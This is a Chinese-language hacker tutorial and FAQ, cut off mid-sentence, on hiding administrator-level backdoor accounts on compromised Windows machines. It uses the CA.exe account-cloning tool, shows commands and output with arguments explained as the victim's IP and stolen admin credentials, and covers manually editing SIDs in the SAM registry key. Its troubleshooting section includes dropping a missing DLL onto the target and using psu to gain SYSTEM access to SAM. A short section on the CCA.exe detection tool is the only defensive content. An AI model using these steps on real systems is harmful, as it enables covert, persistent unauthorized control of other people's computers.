利用SA.exe 將Iusr_victim克隆為Administrator。 

C:\>ca \\192.168.0.1 test test iusr_victim password 
Clone Administrator, by netXeyes 2002/04/06 
Written by netXeyes 2002, dansnow@21cn.com 

Connect 192.168.0.1 ....OK 
Get SID of iusr_victim ....OK 
Prepairing ....OK 
Processing ....OK 
Clean Up ....OK 

這時(shí)，iusr_victim就成為了超級(jí)用戶，并有具有和Administrator同樣的設(shè)置(桌面、菜單等等）。 

注：在ca \\192.168.0.1 test test iusr_victim password 中， 
192.168.0.1是肉雞的IP地址；第一個(gè)test是你已經(jīng)得到的肉雞上的管理員用戶名，第二個(gè)test是這個(gè)用戶名的密碼；iusr_victim是你想克隆的帳號(hào)，最后這個(gè)password就是你想給iusr_victim用的密碼。 
------------------------------------------------------- 

用CCA.EXE檢查是否存在克隆的帳號(hào)。 
不必改變ACL, 支持遠(yuǎn)程檢查。 
C:\>cca \\192.168.0.29 administrator 123456 
Check Clone Account, by netXeyes 2002/04/29 
Written by netXeyes 2002, dansnow@21cn.com 

Connect 192.168.0.29 ....OK 
Prepairing ....OK 
Processing ....OK 
Checking .... 

Check Result: 

[DuDu] AS SAME AS [administrator] 
[Guest] AS SAME AS [administrator] 
[IUSR_RONG] AS SAME AS [administrator] 
[IWAM_RONG] AS SAME AS [administrator] 
[TEST] AS SAME AS [administrator] 
[xr] AS SAME AS [administrator] 
[Guest] AS SAME AS [DuDu] 
[IUSR_RONG] AS SAME AS [DuDu] 
這上面的DuDu，guest，IUSR_RONG等帳戶就已經(jīng)是被克隆為administrator啦
注意刪除克隆賬戶是小心一定注意。我試驗(yàn)過(guò)很多機(jī)子刪除之后administrator賬戶不再超管組


其實(shí)可隆帳號(hào)就是利用命名管道來(lái)把sam文件重置一份，前提是要對(duì)方的netbios端口，NETBEUI協(xié)議都裝了，而且ipc$,admin$都要開(kāi)著~~
我記得還有在注冊(cè)表下修改用戶的SID也可以的，只要把所要可隆的帳號(hào)的SID改成已知的那個(gè)號(hào)的SID 具體自己到網(wǎng)上找~~
1，使用ca時(shí)，出現(xiàn)connect **.**.**.** ...Error是怎么會(huì)事？ 
答：ca和cca需要目標(biāo)開(kāi)放ipc$，請(qǐng)確認(rèn)可以與目標(biāo)建立ipc$。參見(jiàn)“關(guān)于ipc$和空連接” 
2，使用ca時(shí)，出現(xiàn)“Processing....ERROR”是怎么會(huì)事？ 
答：這說(shuō)明對(duì)方主機(jī)缺少文件msvcp60.dll，想辦法傳個(gè)過(guò)去放在系統(tǒng)目錄下就可以了。 
3，克隆過(guò)程沒(méi)有錯(cuò)誤，但cca沒(méi)有顯示該帳號(hào)克隆成功，無(wú)法使用被克隆的帳號(hào)。 
答：這一般是因?yàn)閷?duì)方主機(jī)是域控制器，注冊(cè)表中sam結(jié)構(gòu)不同，工具失效。暫時(shí)無(wú)法解決。 
4，手動(dòng)克隆無(wú)法訪問(wèn)注冊(cè)表SAM鍵怎么辦？ 
答：在命令行方式，可以使用psu工具獲得SYSTEM權(quán)限，從而訪問(wèn)SAM鍵。詳見(jiàn)上面說(shuō)明。 
在圖形界面，運(yùn)行regedt32.exe，找到SAM鍵并選中。“安全”子菜單欄里有一項(xiàng)“權(quán)限”，打開(kāi)它。在里面設(shè)